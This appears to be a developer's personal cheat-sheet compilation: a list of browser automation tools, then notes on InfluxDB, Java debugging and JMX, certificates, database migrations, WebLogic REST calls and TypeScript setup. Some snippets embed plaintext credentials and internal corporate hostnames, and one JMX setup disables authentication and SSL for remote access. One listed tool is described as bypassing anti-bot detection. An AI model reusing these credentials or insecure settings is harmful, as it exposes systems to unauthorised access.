Error in user YAML: (<unknown>): did not find expected '-' indicator while parsing a block collection at line 4 column 1
---

## 1. **Headless Browsers & Automation Frameworks**

### **Puppeteer** (Node.js)
- Headless Chrome/Chromium automation.
- Excellent for rendering JS-heavy pages.
- [GitHub](https://github.com/puppeteer/puppeteer)

### **Selenium** (Multiple languages)
- Automation for all major browsers.
- Can be run headless.
- [Website](https://www.selenium.dev/)

### **Playwright** (Node.js, Python, Java, .NET)
- Multi-browser support (Chromium, WebKit, Firefox).
- Feature-rich, modern alternative to Puppeteer.
- [GitHub](https://github.com/microsoft/playwright)

### **Nightmare.js** (Node.js)
- Headless automation for Electron.
- Simpler than Puppeteer/Playwright, but less maintained.
- [GitHub](https://github.com/segmentio/nightmare)

### **Cypress** (JavaScript)
- Primarily for end-to-end testing, but can be used to extract rendered HTML.
- [Website](https://www.cypress.io/)

Here is a list of popular **console (text-based) browsers** with the ability to dump the screen or page content:

---

2. **Console Browsers **

1. w3m

  • Description: Text-based web browser with support for tables, frames, SSL, and images (in terminals with graphics support).
  • Dump screen:
    w3m -dump URL_or_file.html
  • Homepage: w3m

2. lynx

  • Description: One of the oldest and most well-known text-based browsers. Highly configurable.
  • Dump screen:
    lynx -dump URL_or_file.html
  • Homepage: lynx

3. links

  • Description: Text browser with support for HTML tables and frames. Has both text and graphics mode.
  • Dump screen:
    links -dump URL_or_file.html
  • Homepage: links

4. elinks

  • Description: An advanced fork of links with more features and scripting support.
  • Dump screen:
    elinks -dump URL_or_file.html
  • Homepage: elinks

5. browsh

  • Description: Modern text-based browser that uses Firefox in the background. Renders complex JS-heavy pages as text/graphics in the terminal.
  • Dump screen (screenshot as text):
    browsh https://example.com
    (No explicit "-dump" option, use with terminal output capture: e.g., script or tee)
  • Homepage: brow.sh

Summary Table

Browser Dump Command Example Notes
w3m w3m -dump URL_or_file.html Good for quick dumps
lynx lynx -dump URL_or_file.html Highly scriptable
links links -dump URL_or_file.html Simple and effective
elinks elinks -dump URL_or_file.html More features than links
browsh browsh URL (capture terminal out) Best for JS-heavy pages

2. Command Line Utilities

htmlunit (Java)

  • Headless browser written in Java.
  • Good for Java-based scraping and automation.
  • Website

PhantomJS (JavaScript - DEPRECATED)

  • Headless WebKit.
  • No longer maintained, but still used.
  • Website

CasperJS (JavaScript - DEPRECATED)

  • Wrapper for PhantomJS for easier scripting.
  • Website

Splash (Python/Lua)

  • Headless browser with HTTP API, built on Chromium.
  • Excellent for use with Scrapy.
  • GitHub

3. Browser Automation via Scripting

AppleScript + Safari/Chrome (macOS only)

  • Can script browsers on macOS to dump HTML.

AutoHotkey / AutoIt (Windows)

  • Windows scripting to automate browser actions.

4. Other Notable Libraries/Tools

BeautifulSoup + Selenium (Python)

  • Use Selenium to render, then BeautifulSoup to parse.

WebDriverIO (Node.js)

  • Selenium-based browser automation for Node.js.
  • Website

TestCafe (Node.js)

  • Automation and testing for web apps.
  • Website

Rod (Go)

  • DevTools driver for Chrome, written in Go.
  • GitHub

chromedp (Go)

  • High-level Chrome DevTools Protocol client for Go.
  • GitHub

Pyppeteer (Python)

  • Python port of Puppeteer.
  • GitHub

undetected-chromedriver (Python)

  • Python package to bypass anti-bot detection.
  • GitHub

5. Cloud/Remote APIs

Browserless

  • Hosted headless browser service (Puppeteer compatible).
  • Website

ScrapingBee, ScraperAPI, etc.

  • API services that can return rendered HTML.

Summary Table

Tool/Library Language(s) Headless Maintained JS Rendering Link
Puppeteer Node.js Yes https://github.com/puppeteer/puppeteer
Selenium Many Yes https://www.selenium.dev/
Playwright Node.js, Python, Java Yes https://github.com/microsoft/playwright
Nightmare.js Node.js Yes ~ https://github.com/segmentio/nightmare
Cypress JavaScript Yes https://www.cypress.io/
htmlunit Java Yes https://htmlunit.sourceforge.io/
PhantomJS JavaScript Yes https://phantomjs.org/
CasperJS JavaScript Yes https://casperjs.org/
Splash Python/Lua Yes https://github.com/scrapinghub/splash
WebDriverIO Node.js Yes https://webdriver.io/
TestCafe Node.js Yes https://testcafe.io/
Rod Go Yes https://github.com/go-rod/rod
chromedp Go Yes https://github.com/chromedp/chromedp
Pyppeteer Python Yes https://github.com/pyppeteer/pyppeteer
undetected-chromedriver Python Yes https://github.com/ultrafunkamsterdam/undetected-chromedriver
Browserless/API Any (via HTTP) Yes https://www.browserless.io/

InfluxDB cheat sheet

InfluxDB official documentation TICK:

  • Telegram
  • InfluxDB
  • Chronograf
  • Kapacitor

Data Model:

InfluxDB has a specialized data model optimized for time-series data. It organizes data into :

  • Database - container for organizing related data, in version 2.x - Bucket
  • Retention Policy - one or more inside database: duration, replication, TimeToLive
  • measurements - one or more inside Retention Policy ( like tables in an RDBMS )
  • tags - are indexed metadata associated with data points
  • fields - store the actual data values
  • timestamps - represent when the data was recorded

start with default config

INFLUX_TAG=2.7.1
# INFLUX_TAG=latest
docker rm influxdb
docker run --name influxdb \
    --publish 8086:8086 \
    --volume influxdb:/var/lib/influxdb \
    influxdb:${INFLUX_TAG}

start influx with custom config

# INFLUX_TAG=2.0
INFLUX_TAG=2.7.1

docker run --name influxdb \
    --publish 8086:8086 \
    --volume influxdb:/var/lib/influxdb \
    --volume $PWD/config.yml:/etc/influxdb2/config.yml \
    influxdb:${INFLUX_TAG}

# influxd -config /path/to/influxdb.conf

config example

reporting-disabled = true

[meta]
  dir = "/var/lib/influxdb/meta"

[data]
  dir = "/var/lib/influxdb/data"
  wal-dir = "/var/lib/influxdb/wal"

[http]
  enabled = true
  bind-address = ":8086"
  auth-enabled = true

connect to existing container

docker exec -it influxdb /bin/bash

use Influx CLI

print current instance config

influxd print-config
INFLUX_USER=my-user
INFLUX_PASS=my-pass-my-pass
INFLUX_BUCKET=my-bucket
INFLUX_CONFIG=my-local-config
INFLUX_URL=localhost:8086

influx setup --org myself-org --bucket $INFLUX_BUCKET --username $INFLUX_USER --password $INFLUX_PASS --force  
influx config list 
INFLUX_TOKEN=`cat /etc/influxdb2/influx-configs | grep "^  token =" | awk '{print $3}' | awk -F '"' '{print $2}'`
echo $INFLUX_TOKEN

if it exists - not possible to make a setup

# INFLUX_TOKEN=my-secret-token
# INFLUX_CONFIG=my-local-config
# # influx config create --help
# influx config create --active \
#   -n $INFLUX_CONFIG \
#   -t $INFLUX_TOKEN \
#   -u http://localhost:8086 \
#   -o myself-org
# 
# # config list
# influx config --help
# influx config list 
# influx config rm $INFLUX_CONFIG

influx query

influx query via cli

# completion
eval $(influx completion bash)

# list of buckets
influx bucket list

# simple query
INFLUX_BUCKET=my-bucket
influx query "from(bucket:\"${INFLUX_BUCKET}\") |> range(start:-1m)" --raw
influx v1 shell
show databases
use my-bucket
# INSERT exampletable, field=1 field2=21 field3=test1, value=0.55 1472666050
# INSERT exampletable, field=1, field2=21 1593122400000000000
# INSERT exampletable,tag1=2 tag2=22 tag3=test2 1439856720000000000
# INSERT exampletable,tag1=3 tag2=23 tag3=test3 1439856000000000000
# 
# insert codenarc,maxPriority2Violations=917,maxPriority3Violations=3336 value=0.10 1593122400000000000
# insert codenarc,maxPriority2Violations=917,maxPriority3Violations=3336 value=0.10 1472666050
# 
# select * from exampletable;
# select * from temperature;

select * from foods;

influx query via curl

# show database 
curl --header "Authorization: Token $INFLUX_TOKEN" --header "Content-Type: application/x-www-form-urlencoded" -G "$INFLUX_URL/query?pretty=true" \
  --data-urlencode "q=SHOW DATABASES"

# show retention policy for specific database
curl --header "Authorization: Token $INFLUX_TOKEN" --header "Content-Type: application/x-www-form-urlencoded" -G "$INFLUX_URL/query?pretty=true" \
  --data-urlencode "db=${INFLUX_BUCKET}" \
  --data-urlencode "q=SHOW RETENTION POLICIES"

# show all data 
curl --header "Authorization: Token $INFLUX_TOKEN" --header "Content-Type: application/x-www-form-urlencoded" -G "$INFLUX_URL/query?pretty=true" \
  --data-urlencode "db=${INFLUX_BUCKET}" \
  --data-urlencode "q=SHOW MEASUREMENTS"

curl --header "Authorization: Token $INFLUX_TOKEN" --header "Content-Type: application/x-www-form-urlencoded" -G "$INFLUX_URL/query?pretty=true"

# show schema
curl --header "Authorization: Token $INFLUX_TOKEN" --header "Content-Type: application/x-www-form-urlencoded" -G "$INFLUX_URL/query?pretty=true" \
--data-urlencode "db=${INFLUX_BUCKET}" \
--data-urlencode "q=SHOW FIELD KEYS"
# insert data 
# --header "Content-Type: text"
curl -v --header "Authorization: Token $INFLUX_TOKEN" --header "Content-Type: application/x-www-form-urlencoded"  \
  -X POST -G "$INFLUX_URL/write?db=${INFLUX_BUCKET}&precision=s" \
  --data-urlencode "db=${INFLUX_BUCKET}" \
  --data-urlencode "temperature,location=1 value=90 1472666050"

curl -v --header "Authorization: Token $INFLUX_TOKEN" --header "Content-Type: application/x-www-form-urlencoded"  \
  -X POST -G "$INFLUX_URL/write?db=${INFLUX_BUCKET}&precision=s" \
  --data-urlencode "db=${INFLUX_BUCKET}" \
  --data-urlencode "temperature,location=1 value=91 1439856720000000000"
# select data 
curl --header "Authorization: Token $INFLUX_TOKEN" --header "Content-Type: application/x-www-form-urlencoded" -G "$INFLUX_URL/query?pretty=true" \
  --data-urlencode "db=${INFLUX_BUCKET}" \
  --data-urlencode "q=select * from foods"

# "q=SELECT * FROM \"events\" WHERE \"type\"='start' and \"applicationName\"='SessionIngestJob$' limit 10"  

curl -G 'http://tesla-influx.k8sstg.mueq.adas.intel.com/query?pretty=true' --data-urlencode "db=metrics" --data-urlencode "q=SELECT jobId FROM \"events\" limit 10"

delete record

curl --silent -G "https://dq-influxdb.dplapps.vantage.org:443/query?pretty=true" \
--data-urlencode "db=${INFLUX_BUCKET}" \
--data-urlencode "q=DROP SERIES FROM \"km-dr\" WHERE \"session\"='aa416-7dcc-4537-8045-83afa2' and \"vin\"='V77777'"
CREATE USER telegraf WITH PASSWORD 'telegrafmetrics' WITH ALL PRIVILEGES

java cheat sheet

links

java ecosystem applications

for quarkus & payara PID=1

command diagnostic request

jcmd $PID VM.flags
jcmd $PID VM.heap_info
jcmd $PID VM.system_properties

statistic over time

# print all options
jstat -options
# garbage collector statistic
jstat -gs $PID
jstat -gs -t $PID 5000 10 # each 5 sec, 10 times

Java process print thread stack traces

jstack $PID

system properties

jinfo $PID

heap dump, jmap

# find process id for target java process
ps auxf

# find amount of threads inside JVM
ps -eww H -p $JAVA_PROCESS_ID

# make heap dump
jmap -histo $JAVA_PROCESS_ID
jmap -clstats $JAVA_PROCESS_ID
jmap -heap $JAVA_PROCESS_ID
jmap -dump:format=b,live,file=$PATH_TO_OUTPUT_HEAP_DUMP $JAVA_PROCESS_ID

java repl java code evaluation

$JAVA_HOME/bin/jshell -v
import java.util.UUID;
UUID.randomUUID();

execute javascript code

#! /usr/bin/env jjs
print('start of the script');
var variableInScript = 5 * 3;
print(" output from script ${threeyr}");

execute script code

# inline
jrunscript -e "cat('https://google.com')"
# js repl
jrunscript
js> t = new java.lang.Thread(function() { print('java Thread in script\n'); })
js> t.start()

JVM parameters

-Xmx56000m 
-XX:+HeapDumpOnOutOfMemoryError 
-XX:HeapDumpPath==/usr/src/bin/log/ 
-XX:OnOutOfMemoryError=/usr/src/bin/start-app.sh
-XX:ErrorFile=/usr/src/bin/log/fatal-errors.log 
-XX:+PrintGCDetails 
-XX:+UseG1GC 
-Xloggc:/usr/src/bin/log/jvm-gc.log 

jps - java process status

jps -v

# process arguments
jps -m 

# Main class of the process
jps -l 

JMX java inspect java state java stuck

# command line argument
-Dcom.sun.management.jmxremote
-Dcom.sun.management.jmxremote.port=5006
-Dcom.sun.management.jmxremote.rmi.port=5006
-Djava.rmi.server.hostname=127.0.0.1 
-Dcom.sun.management.jmxremote.local.only=false
-Dcom.sun.management.jmxremote.authenticate=false
-Dcom.sun.management.jmxremote.ssl=false
# additional parameters
-Djmx.rmi.registry.port=5006 
-Djmx.rmi.port=5006
# OpenShift settings
# connect to openshift
$ oc login $OC_HOST:8443
 
# forward ports from localhost to pod
# oc port-forward $POD_NAME <local port>:<remote port>
$ oc port-forward $POD_NAME 5006
 
# e.g. connect to the jmx port with visual vm
visualvm --openjmx localhost:5006
jconsole localhost:5006

visualvm

set specific jdk

vim etc/visualvm.conf

visualvm_jdkhome="/home/my-user/.sdkman/candidates/java/18.0.1-oracle"

for connecting to jvm - select "new jmx connection"

java application debug, remote debug

java -jar ...

-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=5005
-agentlib:jdwp=transport=dt_socket,server=y,suspend=y,address=localhost:5005

The Java image on OpenShift has built-in support for remote debugging

# environment variables
JAVA_DEBUG=true  
# or
oc set env dc/inventory JAVA_DEBUG=true

you can create SSH tunnel between your local machine and remote: ( execute next line from local machine )

ssh -L 7000:127.0.0.1:5005 $REMOTE_USER@$REMOTE_HOST

and your connection url will looks like: 127.0.0.1:7000
or
connect with local openshift client

# connect to openshift
$ oc login $OPENSHIFT_HOST:8443

# forward the jmx ports
$ oc port-forward $POD_NAME 5005

java application console debug headless debug

image

connect to process

jdb -attach localhost:5005
jdb -attach localhost:5005 -sourcepath :src/main/java/

commands inside debugger

# set breakpoint on line
stop at com.ubs.ad.data.interval.v2.IntervalServiceImpl:189
# set breakpoint on method
stop at com.ubs.ad.data.interval.v2.IntervalServiceImpl.getAvailability

# print list of breakpoints
clear  

# remove breakpoint 
clear com.ubs.ad.data.interval.v2.IntervalServiceImpl:189

# print local variables 
locals

# for all methods need to use full name of the class
print com.ubs.interval.IntervalValidator.isContributorIdValid(subscriber)
eval com.ubs.interval.IntervalValidator.isContributorIdValid(subscriber)

# print current stack trace, print position
where 

print intervalsIdList
dump intervalsIdList
set intervalsIdList=new ArrayList<>();

movements inside debugger

next                      -- step one line (step OVER calls)
cont                      -- continue execution from breakpoint

step                      -- execute current line ( step in )
step up                   -- execute until the current method returns to its caller
stepi                     -- execute current instruction

java agent

-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=9010
java -javaagent:<agent-path.jar>=<agent args> -jar <your-jar.jar>

attach to process, agent to pid, java agent

// Using com.sun.tools.attach.VirtualMachine:
VirtualMachine vm = VirtualMachine.attach(pid)
vm.loadAgent(jarPath, agentArgS)
vm.detach()

get current java version java runtime version

System.getProperty("java.runtime.version");

set proxy system properties

System.getProperties().put("http.proxyHost", "someProxyURL");
System.getProperties().put("http.proxyPort", "someProxyPort");

-Dhttp.proxyHost=127.0.0.1 -Dhttp.proxyPort=3128 -Dhttps.proxyHost=127.0.0.1 -Dhttps.proxyPort=3129
export _JAVA_OPTIONS="-Dhttp.proxyHost=127.0.0.1 -Dhttp.proxyPort=3128 -Dhttps.proxyHost=127.0.0.1 -Dhttps.proxyPort=3128 -Dhttp.nonProxyHosts=localhost|*.ubsgroup.net|*.zur -Dhttps.nonProxyHosts=localhost|*.ubsgroup.net|*.muc"

print all classes for running application

java -verbose:class -version
java -verbose:class --classpath:my.jar  ClassWithMain

certificates

create certificate

Browser.address url.lock(broken lock) -> Certificate -> Details -> Copy to File -> Base-64 encoded X.509 -> metrics.cer
# keytool -printcert -sslserver path.to.server.com:443

read certificate

openssl x509 -text -noout -in elastic-staging.cer 

import certificate to truststore

ls myTrustStore && rm myTrustStore;
CERT_FILE=metrics.cer
keytool -printcert -rfc -file $CERT_FILE
keytool -printcert -file $CERT_FILE

CERT_ALIAS=metrics
TRUST_STORE=myTrustStore
keytool -import -file $CERT_FILE -alias $CERT_ALIAS -keystore $TRUST_STORE

# list of certificates in truststore, jks keystore info
keytool -list -keystore $TRUST_STORE

# export and print certificate
keytool -exportcert -keystore $TRUST_STORE -alias $CERT_ALIAS -file out.crt
keytool -printcert -file out.crt

create empty truststore

TRUST_STORE=emptyStore
ls $TRUST_STORE && rm $TRUST_STORE;
CERT_ALIAS=garbage
STORE_PASS="my_pass"

# create truststore with one record
keytool -genkeypair -alias $CERT_ALIAS -storepass $STORE_PASS -keypass secretPassword -keystore $TRUST_STORE -dname "CN=Developer, OU=Department, O=Company, L=City, ST=State, C=CA"
# list of records
keytool -list -keystore $TRUST_STORE -storepass $STORE_PASS
## delete records
keytool -delete -alias $CERT_ALIAS -storepass $STORE_PASS -keystore $TRUST_STORE
# list of records 
keytool -list -keystore $TRUST_STORE -storepass $STORE_PASS

execute application from java, execute sub-process, start program

start and waiting for finish

new ProcessExecutor().commandSplit(executeLine).execute();

start in separate process without waiting

new ProcessExecutor().commandSplit(executeLine).start();

with specific directory

new ProcessExecutor().commandSplit(executeLine).directory(executableFile.getParentFile()).start();

@Null

use Optional.absent

locking

Reentrant lock == Semaphore

jshell

print import

/!

help

/help
/?

exit

/exit

JAR

create jar based on compiled files

jar cf WC2.jar *.class

take a look into jar, list all files into jar

jar tvf WC2.jar

print loaded classes during start application

java -verbose app

Security

collaboration with underlying system javacallbacks

LOG4j

log4j configuration key for JVM

-Dlog4j.configuration={path to file}

log4j override configuration from code

Properties props = new Properties();
props.put("log4j.rootLogger", level+", stdlog");
props.put("log4j.appender.stdlog", "org.apache.log4j.ConsoleAppender");
props.put("log4j.appender.stdlog.target", "System.out");
props.put("log4j.appender.stdlog.layout", "org.apache.log4j.PatternLayout");
props.put("log4j.appender.stdlog.layout.ConversionPattern","%d{HH:mm:ss} %-5p %-25c{1} :: %m%n");
// Execution logging
props.put("log4j.logger.com.hp.specific", level);
// Everything else 
props.put("log4j.logger.com.hp", level);
LogManager.resetConfiguration();
PropertyConfigurator.configure(props);

log4j file configuration

<?xml version="1.0" encoding="UTF-8"?>
    <Configuration status="WARN">
      <Appenders>
        <Console name="Console" target="SYSTEM_OUT">
          <PatternLayout pattern="%d{HH:mm:ss.SSS} [%t] %-5level %logger{36} - %msg%n"/>
        </Console>
      </Appenders>
      <Loggers>
        <Logger name="com.foo.Bar" level="debug">
          <AppenderRef ref="Console"/>
        </Logger>
        <Root level="debug">
          <AppenderRef ref="Console"/>
        </Root>
      </Loggers>
    </Configuration>

log4j update configuration during runtime, refresh configuration

<?xml version="1.0" encoding="UTF-8"?>
<Configuration monitorInterval="30">
...
</Configuration>

Oracle connection

// METHOD #1 - Using no service
String dbURL1 = "jdbc:oracle:thin:ubs_client_connect_check/[email protected]:1530:tstdha01";
conn1 = DriverManager.getConnection(dbURL1);
if (conn1 != null) {
    conn1.setClientInfo("OCSID.MODULE", "Connection 1 - NO Service");
    Statement stmt1 = conn1.createStatement();
    stmt1.execute("select 1 from dual");
}


// METHOD #2 - using the service
String dbURL2 = "jdbc:oracle:thin:ubs_client_connect_check/mypassword@//tldr.ubsgroup.net:1530/pdb_tstdha01.UBS";
conn2 = DriverManager.getConnection(dbURL2);
if (conn2 != null) {
    conn2.setClientInfo("OCSID.MODULE", "Connection 2 - Service");
    Statement stmt2 = conn2.createStatement();
    stmt2.execute("select 1 from dual");
}


// METHOD #3 - using tns entry
String dbURL3 = "jdbc:oracle:oci:@tldr01";
Properties properties = new Properties();
properties.put("user", "ubs_client_connect_check");
properties.put("password", "password");
properties.put("defaultRowPrefetch", "20");
conn3 = DriverManager.getConnection(dbURL3, properties);


// METHOD #4 - using LDAP
// jdbc:oracle:thin:@ldap://oraid1.zur:389/orainv,cn=oraclecontext,dc=zur,dc=ubs,dc=de ldap://oraid2.zur:389/orainv,cn=oraclecontext,dc=zur,dc=ubs,dc=de

hsqldb Oracle dialect

driverClassName="org.hsqldb.jdbc.JDBCDriver"
url="jdbc:hsqldb:mem:test;sql.syntax_ora=true"
username="sa" password=""

liquibase


liquibase print sql scripts ( update sql )

java -jar C:\soft\maven-repo\org\liquibase\liquibase-core\3.4.1\liquibase-core-3.4.1.jar  \
--driver=oracle.jdbc.OracleDriver --classpath=C:\soft\maven-repo\com\oracle\ojdbc6\11.2.0.2.0\ojdbc6-11.2.0.2.0.jar  \
--changeLogFile=C:\temp\liquibase\brand-server\master.xml  \
--contexts="default" \
--url=jdbc:oracle:thin:@q-ora-db-scan.wirecard.sys:1521/stx11de.wirecard --username=horus_user_cherkavi --password=horus_user_cherkavi \
 updateSQL > script.sql

liquibase test scripts against H2 database

java -jar liquibase-core-3.5.5.jar  --driver=org.h2.Driver --classpath=h2-1.4.197.jar --changeLogFile=C:\project\opm\opm-persistence\src\main\resources\db\changelog\changes.xml --url=jdbc:h2:mem:testdb;Mode=Oracle --username=sa --password=  update

flyway

image

  • In database Flyway operates with "schema_version" table only ( no knowledge about the rest of DB, doesn't make scan of the DB .... )
  • SQL files: SQL.DDL and/or SQL.DML
  • Manual changes SQL.DML is not dangerous
  • Manual changes SQL.DDL is dangerous commandline documentation

folder structure

/-<root>
  /drivers
  /jars
  /scripts
  /sql

execute flyway from commandline, db info

java -cp flyway-core-4.0.3.jar;flyway-commandline-5.1.3.jar org.flywaydb.commandline.Main -configFile=flyway-info.conf info

to see debug log, need to add next jars into classpath:

  • slf4j-api-1.7.25.jar
  • log4j-to-slf4j-2.10.0.jar
  • log4j-core-2.10.0.jar
  • log4j-api-2.10.0.jar
  • log4j-1.2.14.jar

slf4j logging

lib/log4j-core-2.11.0.jar:\
lib/log4j-api-2.11.0.jar:\
lib/log4j-slf4j-impl-2.11.0.jar:\

and execute

java -Dlog4j2.debug=true 

config file example

flyway.driver=oracle.jdbc.OracleDriver
flyway.url=jdbc:oracle:thin:@vpn050.kabel.de:1523:PMDR
flyway.user=login
flyway.password=pass
flyway.locations=filesystem:../fixnet-data/,classpath:db.migration.initialize

execute flyway with command line parameters

flyway migrate -driver=oracle.jdbc.OracleDriver -url=jdbc:oracle:thin:@vs050:1523:PMDR -user=xnet -password=xnet -locations=filesystem:/opt/oracle/scripts"

flyway table with current migration status

select * from {schema name}."schema_version";

update schema name with "success" flag

update {schema name}."schema_version" set "success"=1 where "version"='3.9'; 

update from java code, custom update from code,

package db.migration.initialize;
import org.flywaydb.core.api.migration.jdbc.JdbcMigration;
public class V1_9_9__insert_initial_gui_configurations implements JdbcMigration {
    @Override
    public void migrate(Connection connection) throws Exception
}
<location>classpath:db.migration.initialize</location>

flyway crc generation flyway control sum generator

    public static int calculateSum(String filePath) {

        final CRC32 crc32 = new CRC32();
 
        try (BufferedReader bufferedReader = new BufferedReader(new FileReader(new File(filePath))); ) {
            String line = null;
            while ((line = bufferedReader.readLine()) != null) {
		    line = BomFilter.FilterBomFromString(line);
	            crc32.update(StringUtils.trimLineBreak(line).getBytes(StandardCharsets.UTF_8));
            }
        } catch (IOException e) {
            System.err.printf("Error while trying to calculate CRC for file %s: %s\n", filePath, e.getMessage());
            System.exit(1);
        }
 
        int checksum = (int) crc32.getValue();
        return checksum;
    }

JNDI datasource examples:

   <Resource name="ds/JDBCDataSource" auth="Container"
              type="javax.sql.DataSource" 
              driverClassName="org.h2.Driver"
              url="jdbc:h2:~/testdb;Mode=Oracle"
              username="sa" 
              password="" maxActive="20" maxIdle="10"
              maxWait="-1"/>

   <Resource name="ds/JDBCDataSource" auth="Container"
              type="javax.sql.DataSource" 
              driverClassName="org.hsqldb.jdbc.JDBCDriver"
              url="jdbc:hsqldb:mem:test;sql.syntax_ora=true"
              username="sa" 
              password="sa" maxActive="20" maxIdle="10"
              maxWait="-1"/>

WildFly

check health of application

<host:port>/<application>/node

Java Testing

insert private fields

ReflectionUtils.makeAccessible(id);
ReflectionUtils.setField(id, brand, "myNewId");

order of tests execution

@FixMethodOrder

rest testing

RestAssured
body("brands.size()")

Sonar

skip checking by code checker

// NOSONAR
@java.lang.SuppressWarnings("squid:S3655")
  -Dsonar.projectVersion=${{ env.POM_PROJECT_VERSION }}
            -Dsonar.projectKey=${{ env.SONAR_PROJECT_KEY }}
            -Dsonar.branch.name=${{ steps.extract_branch.outputs.branch }}
            -Dsonar.language=java 
            -Dsonar.java.source=17
            -Dsonar.exclusions=**/*DTO.java,**/exception/**/*.java,**/serdes/*.java,src/main/python/**
            -Dsonar.java.binaries=target
            -Dsonar.java.sources=src/main/java
            -Dsonar.sources=src/main
            -Dsonar.java.tests=src/test/java
            -Dsonar.coverage.jacoco.xmlReportPaths=target/jacoco-report/jacoco.xml

Hibernate

@Modifying

for custom queries only

force joining

@WhereJoinTable

inheritance types

- table per hierarchy ( SINGLE_TABLE )
- table per sub-class ( JOINED )
- table per class ( TABLE_PER_CLASS )

BPMN

Vaadin

show frame

    void showFrame(File file){
        Window window = new Window();
        window.setWidth("90%");
        window.setHeight("90%");
        BrowserFrame e = new BrowserFrame("PDF File", new FileResource(file));
        e.setWidth("100%");
        e.setHeight("100%");
        window.setContent(e);
        window.center();
        window.setModal(true);
        UI.getCurrent().addWindow(window);
    }

debug window

http://localhost:8090/?debug

Derby

into 'bin' folder add two variables for all scripts:

 export DERBY_INSTALL=/dev/shm/db/db-derby-10.14.2.0-bin/ 
 export DERBY_HOME=/dev/shm/db/db-derby-10.14.2.0-bin/ 

start with listening all incoming request ( not from localhost )

./startNetworkServer -h vldn338

create DB before using, from jdbc url

jdbc:derby://vldn338:1527/testDB;create=true

maven dependency

<dependency>
    <groupId>org.apache.derby</groupId>
    <artifactId>derbyclient</artifactId>
    <version>10.14.2.0</version>
</dependency>

jdbc

Driver: org.apache.derby.jdbc.ClientDriver
jdbc: jdbc:derby://vldn338:1527/dbName
user: <empty>
pass: <empty>

Activiti

create/init DB

activiti-engine-x.x.x.jar/org/activiti/db/create/activiti.create.sql

email, e-mail, smtp emulator

FakeSMTP

java -jar fakeSMTP.jar --help

run example:

java -jar fakeSMTP.jar -s -b -p 2525 -a 127.0.0.1  -o output_directory_name 

e-mail server smtp, pop3, imap with SSL

MailServer

java -Dgreenmail.smtp.hostname=0.0.0.0 -Dgreenmail.smtp.port=2525 -Dgreenmail.pop3.hostname=0.0.0.0 -Dgreenmail.pop3.port=8443 -Dgreenmail.users=Vitali.Cherkashyn:[email protected],user:[email protected] -jar  greenmail-standalone-1.5.7.jar 

WebLogic REST management

using REST services


list of all DataSources:

curl -X GET http://host:7001/management/wls/latest/datasources

return all accessible parameters for request

curl -X OPTION http://host:7001/management/wls/latest/datasources

request with authentication ( where magic string is "username:password" in base64 )

curl -H "Authorization: Basic d2VibG9naWM6d2VibG9naWMx" -X GET http://host:7001/management/wls/latest/datasources

request with authentication

curl --user username:password -X GET http://host:7001/management/wls/latest/datasources

description of one DataSource:

curl -X GET http://host:7001/management/wls/latest/datasources/id/{datasourceid}

domain runtime

curl --user weblogic:weblogic1  -X GET http://host:7001/management/weblogic/latest/domainRuntime

server parameters, server folders, server directories, server status, server classpath

curl --user weblogic:weblogic1  -X GET http://host:7001/management/weblogic/latest/domainRuntime/serverRuntimes

list of deployments

curl -v --user weblogic:weblogic1 -H X-Requested-By:MyClient -H Accept:application/json -X GET http://host:7001/management/wls/latest/deployments

list of applications

curl --user weblogic:weblogic1 -H Accept:application/json -X GET http://host:7001/management/wls/latest/deployments/application

info about one application

curl --user weblogic:weblogic1 -H Accept:application/json -X GET http://host:7001/management/wls/latest/deployments/application/id/userappname-gui-2018.02.00.00-SPRINT-7

remove application, undeploy application, uninstall application

curl --user weblogic:weblogic1 -H X-Requested-By:weblogic -H Accept:application/json -X DELETE http://host:7001/management/wls/latest/deployments/application/id/userappname-gui-2018.02.00.00-SPRINT-7

deploy application

curl -X POST --user weblogic:weblogic1 -H X-Requested-By:weblogic -H Accept:application/json -H Content-Type:application/json [email protected] http://host:7001/management/wls/latest/deployments/application
{
    "name":"userappname-gui-2018.02.00.00-SPRINT-7"
   ,"deploymentPath":"/opt/oracle/domains/pportal_dev/binaries/userappname-gui-2018.02.00.00-SPRINT-7.war"
   , "targets": ["pportal_group"]
}
OpenXava create new project from DataSource
	1 - switch to workspace %OPENXAVA%/workspace
	2 - open project OpenXavaTemplate
	3 - execute ant script: CreateNewProject.xml
	4 - enter name of project (Monolith) 
	5 - import new project into workspace ( import existing project )
	6 - replace dialect - %OPENXAVA%/workspace/Monolith/persistence/hibernate.cfg.xml
	7 - replace dialect - %OPENXAVA%/workspace/Monolith/persistence/META-INF/persistence.xml
	8 - create hibernate mapping from Database ( by JBoss tool )
	8.1 - create Hibernate console
	8.2 - create Hibernate Code Generation Configuration
	8.3 - run Hibernate Code Generation Configuration
	9 - add annotations:
	9.1 - add import to each Domain file: 
		import javax.persistence.*;
		import org.openxava.annotations.*;
	9.2 - add annotations to each column:
 	    @Id
	    // GeneratedValue(strategy=GenerationType.AUTO)
	    @Hidden
	    @Column(name = "value_id", length=36, nullable = false)
	    private String valueId;
	
    	    @Required
    	    @Column(name = "group", length = 20, nullable = false)
	    private String group;
	
	10 - add openxava annotations to each Entity:
	11 - execute ant compile ( %OPENXAVA%/workspace/Monolith/  )
	12 - execute ant deployWar ( %OPENXAVA%/workspace/Monolith/  )
	13 - execute tomcat
	14 - goto 
		http://localhost:8080/Monolith/modules/Value
		<     tomcat   path ><Project >       < entity name >

Version differences

java 8 to 9

JavaScript

Typescript cheat sheet

start new typescript application

### create folder
mkdir sandbox-typescript
cd sandbox-typescript

# init npm 
npm init

# sudo apt install node-typescript
tsc --init
# {
#   "compilerOptions": {
#     "target": "es6",
#     "module": "commonjs",
#     "esModuleInterop": true,
#     "moduleResolution": "node",
#     "sourceMap": true,
#     "noImplicitAny": false,
#     "outDir": "dist"
#   },
#   "lib": ["es2015"]
# }
vim tsconfig.json


### install dependencies
## typescript should have the same version `tsc --version` - like 3.8.3 
npm install -D typescript
npm install -D tslint
## local server 
npm install -S express
npm install -D @types/express
## custom libraries 
npm install -D json-bigint
npm install -D bignumber.js

# tslint init
./node_modules/.bin/tslint --init

# "rules": {"no-console": false},
vim tslint.json

# "start": { "tsc && node dist/app.js", ...
vim package.json

### application start point
# import express from 'express';
# const app = express();
# const port = 3000;
# app.get('/', (req, res) => {res.send('up and running');});
# app.listen(port, () => {console.error(`server started on port ${port}`);});

mkdir src
vim src/app.ts

# start app
npm start

Terminal sh/bash replacement

npm install -g bun
import { $ } from "bun";

const output = await $`ls *.js`.arrayBuffer();

JS Obfuscator

